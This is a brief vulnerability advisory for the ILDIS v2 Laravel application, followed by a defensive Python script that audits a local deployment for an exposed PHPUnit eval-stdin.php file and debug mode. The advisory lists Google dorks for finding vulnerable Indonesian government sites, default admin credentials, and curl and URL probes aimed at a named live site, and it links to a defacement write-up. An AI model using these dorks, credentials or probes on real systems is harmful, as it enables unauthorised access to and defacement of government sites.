ILDIS v2 Applications Multiple Vulnerabilities

2021.05.04
KimiHmei7 (ID)
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : Ildis v2 Applications Multiple Vulnerabilities
# Vendor Homepage : http://jdihn.go.id
# Discovered By: KimiHmei7
# Author Homepage: https://tegalsec.org https://draxploit.web.id
# Framework: Laravel
# Google Dork:
"ILDIS" site:go.id
inurl:?tipe_dokumen= site:go.id
inurl:/data_dokumen site:go.id
intitle:Signin | ILDIS JDIHN

# Vulnerabilities

1. Default Login
https://site.go.id/login
admin | admin123

2. PHPUnit Remote Code Execution
http://jdih.dprd.belitung.go.id//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
(blank, maybe vuln but can't get RCE access. other sites using same path)

3. Laravel Debug Misconfiguration / information disclosure
$ curl -d 1=1 http://jdih.dprd.belitung.go.id/

Thanks to DragonXploiter (Haikal)
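A local check for the second and third findings, as an added example that is not part of the original advisory or the ILDIS code base: it inspects a Laravel deployment on disk for the PHPUnit `eval-stdin.php` file sitting under the served directory and for `APP_DEBUG` left enabled in `.env`. The function names, finding labels and the sample tree are assumptions made for illustration.

```python
import tempfile
from pathlib import Path

# Path named in the advisory, relative to the directory the web server serves.
PHPUNIT_STUB = Path("vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php")
# Values that leave APP_DEBUG off once cast to a boolean; anything else is
# treated as "on" so the audit errs on the side of reporting.
DEBUG_OFF = {"", "0", "false", "(false)", "null", "(null)", "empty", "(empty)"}

def read_env(env_file):
    """Parse KEY=VALUE lines of a .env file; skip comments, strip quotes."""
    values = {}
    for line in Path(env_file).read_text().splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, _, val = line.partition("=")
            values[key.strip()] = val.strip().strip("'\"")
    return values

def audit(app_root, docroot=None):
    """Return finding labels for a Laravel tree on local disk.
    docroot is the directory the web server serves (default: app_root/public)."""
    app_root = Path(app_root)
    docroot = Path(docroot) if docroot else app_root / "public"
    findings = []
    if (docroot / PHPUNIT_STUB).is_file():
        findings.append("phpunit-stub-web-reachable")      # item 2: file is served
    elif (app_root / PHPUNIT_STUB).is_file():
        findings.append("phpunit-dev-dependency-present")  # not served, still dev code
    env_path = app_root / ".env"
    if env_path.is_file():
        debug = read_env(env_path).get("APP_DEBUG", "false").lower()
        if debug not in DEBUG_OFF:
            findings.append("app-debug-enabled")           # item 3
    return findings

def build_sample(root, debug="true"):
    """Constructed sample tree: a project with dev dependencies and a .env."""
    root = Path(root)
    stub = root / PHPUNIT_STUB
    stub.parent.mkdir(parents=True)
    stub.write_text("<?php // placeholder\n")
    (root / "public").mkdir()
    (root / ".env").write_text(f"# constructed\nAPP_ENV=production\nAPP_DEBUG={debug}\n")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        app = build_sample(tmp)
        print("served from public/:", audit(app))
        print("served from project root:", audit(app, docroot=app))
```

Serving only the `public/` directory, installing dependencies with `composer install --no-dev`, and setting `APP_DEBUG=false` clear all three labels. The default `admin` account from item 1 has to be changed in the application itself.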

References:

https://www.draxploit.web.id/2021/01/deface-ildis-v2-information.html?m=1

